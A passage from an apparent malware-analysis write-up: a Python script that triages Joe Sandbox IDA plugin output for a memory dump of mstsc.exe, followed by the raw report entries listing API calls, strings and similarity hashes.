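                    "args": m["args"].split(",") if m["args"] else []}
            if m["helper"]:  # made inside a shared helper, not by this function directly
                cur["helpers"][int(m["helper"], 16)].append(call)
            else:
                cur["direct"].append(call)
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur["strings"].append((m["text"], int(m["ref"], 16)))
        elif section == "Memory Dump Source" and (m := SOURCE_RE.match(line)):
            cur["source"] = {"pid": int(m["pid"], 16), "snapshot": int(m["snap"], 16),
                             "base": int(m["base"], 16), "pe": m["pe"] == "true"}
    return entries

def entry_address(entry):
    """Lowest direct call site stands in for the function's address."""
    refs = [c["ref"] for c in entry["direct"]]
    return min(refs) if refs else None

def to_rva(entry, va):
    """Dump VA -> RVA in the rebased image, for comparison with the clean mstsc.exe on disk."""
    return va - entry["source"]["base"] if entry["source"] else None

def shared_helpers(entries):
    """Helper address -> sorted addresses of the functions that route through it."""
    users = defaultdict(set)
    for e in entries:
        for helper in e["helpers"]:
            users[helper].add(entry_address(e))
    return {h: sorted(a for a in s if a is not None) for h, s in users.items()}

def flag_entries(entries, watch_modules=("CRYPT32",), watch_apis=("GetProcAddress",)):
    """Illustrative triage: direct calls into watched modules plus dynamically resolved symbols."""
    flagged = []
    for e in entries:
        reasons = {f'direct:{c["module"]}!{c["api"]}' for c in e["direct"] if c["module"] in watch_modules}
        for c in (c for group in e["helpers"].values() for c in group):
            if c["api"] in watch_apis:  # second argument of GetProcAddress is the symbol name
                reasons.add(f'helper:{c["api"]}->{c["args"][1] if len(c["args"]) > 1 else "?"}')
        if reasons:
            flagged.append((entry_address(e), sorted(reasons)))
    return flagged

if __name__ == "__main__":
    entries = parse_entries(SAMPLE)
    for addr, reasons in flag_entries(entries):
        print(f"{addr:08X} (RVA {to_rva(entries[0], addr):06X}): {', '.join(reasons)}")
    for helper, users in shared_helpers(entries).items():
        print(f"helper {helper:08X} shared by {[f'{u:08X}' for u in users]}")
```

On the sample, the function at 00957924 is flagged for its direct CRYPT32 call and for the GetProcAddress resolution of EventActivityIdControl made through helper 00911040, and that helper is reported as shared by the 00957924 and 0095B289 functions. Helper calls are kept separate from direct calls on purpose: the report repeats the same subcall lines under every caller, so counting them as the caller's own API usage would inflate every function that logs through ETW. Because the dump is "based on PE", subtracting the 0x900000 base gives an RVA that can be looked up in the on-disk mstsc.exe; a call site whose RVA has no counterpart there is a candidate for injected code.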
APIs
• SystemParametersInfoW.USER32(00000082,00000000,?,00000000), ref: 0091D1FE
• PostMessageW.USER32 ref: 0091D269
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Message$AddressFreeHandleInfoLibraryModuleParametersPostProcSystemTrace
• String ID: put_FullScreen failed!
• API String ID: 2397186937-1360584600
• Opcode ID: 353bbcc5a9d21f9cc63aea1f23f1784eb3e5ea2019722d15fa681826a21c125b
• Instruction ID: 0c0ff953dca4db9a122826558192721dd0557f9b6671802ff98702a605e04b2f
• Opcode Fuzzy Hash: 353bbcc5a9d21f9cc63aea1f23f1784eb3e5ea2019722d15fa681826a21c125b
                                                                                                                                                                                    • Instruction Fuzzy Hash: E811C67270420CBFD7159F95CC89EA67BADFB85354F004565F824D7161CA72DC50DB90
APIs
• SetRect.USER32 ref: 009242E4
  • Part of subcall function 00916497: MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,?,00000020), ref: 009164E1
• CopyRect.USER32(?,?), ref: 009242C6
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Rect$ByteCharCopyMultiWide
• String ID: (
• API String ID: 3526781790-3887548279
• Opcode ID: 066158643c09da7b1e4ca563d0d45a4ca0a3662d666bf2f88a7396993a51b4dd
• Instruction ID: 035af3a754da264d651e7452cf9b8c1e327f06b602330f27160869f45060e4b1
• Instruction Fuzzy Hash: 7601F532B00218A7DB18EE7AAC56BFE736DDB89311F10852AF822E61C1DE74D8058665
APIs
• TraceMessage.ADVAPI32(00000000,00000000,0000002B,00906680,00000143,?,00000004,00000000,00000004,NULL,0000000A,00000000,00000000,00000000,?,00930066), ref: 009269EE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: MessageTrace
• String ID: <NULL>$NULL
• API String ID: 471583391-888386124
• Opcode ID: 6e45da0fc407211d9491d347743d0a3fb50ab53118d18b03fc578292d86b7c0b
• Instruction ID: bfa94eafd92959d30f019a4e6ed30cfb4741dda060b4b11ceac19cf4897e65d2
• Instruction Fuzzy Hash: 9901243A280311AAEF248F04EC05FB73329DBC5B40F008519FB214B9D8CAB06DDAC390
APIs
• MonitorFromWindow.USER32(?,00000002,00902988,0096A020), ref: 0094BB35
• GetMonitorInfoW.USER32(00000000,00000000), ref: 0094BB4B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Monitor$FromInfoWindow
• String ID: (
• API String ID: 332468611-3887548279
• Opcode ID: 8d82dd2375cde6609ea15687e161f09084306394b136d3052acc75dbed4d2af4
• Instruction ID: 0adc1ccb142fa56dd09057a8fbae47a5d3dc89b8bd3eacbca424bd02b6687e39
• Instruction Fuzzy Hash: 19015E75A11208AFDB14CFA5EC89AEEBBF8EF49321F50416AE801A7240EB709804CB50
APIs
Strings
• SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation, xrefs: 00966BFA, 00966C07
• SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults, xrefs: 00966BF1
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Open
• String ID: SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation$SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults
• API String ID: 71445658-4013566426
• Opcode ID: 127569ea576c0e5831e7409d01ee5ac242f0591f83be956c80cdc87501dd6c07
• Instruction ID: adbe9f4c7a32ba4011e29dd1d4433eaf1255b0528c6c105180511d70752a3165
• Instruction Fuzzy Hash: 0BE05EB0751225DFEB2C1A28CCABB36A29DDB5071AF21416CBA43DD1E1E6695800A360
APIs
• FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,00000000,00967412,00000000,00000000,0096766F,00000000,?,00000000,00000000,?), ref: 009673E4
• LoadResource.KERNEL32(00000000,00000000,?,00000000,00000000,?), ref: 009673F2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Resource$FindLoad
• String ID: MUI
• API String ID: 2619053042-1339004836
• Opcode ID: f56fa65762ce12c398ad60486a50b8c0988728e1af240ebf8cdcb358446d9437
• Instruction ID: f3a9e6acb226446d4a2eb4aadf682e9e47742a52aae4621ab5d50ee2a71c1830
• Instruction Fuzzy Hash: 84D012B22991207BE66027597C0DFEB1A0CDB81B65F154145FC2095191DBD49C4251D5
APIs
• LocalAlloc.KERNEL32 ref: 00953C10
• memcpy.MSVCRT(00000000,00000000,?), ref: 00953C25
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: AllocLocalmemcpy
• String ID:
• API String ID: 310742750-0
• Opcode ID: 0d83f6231b7b6c273c238f7dce09cb96073afb66963e2858c358f0bc8d056c10
• Instruction ID: a0d632220c4c181c304dd41d48dc2040316bd23eabcc9a912e877dea47fdbb31
• Instruction Fuzzy Hash: 2F21F531500706ABDB20DE778C05B7B77ACABC1796F04C52DFD59D6280DA74DA09D7A0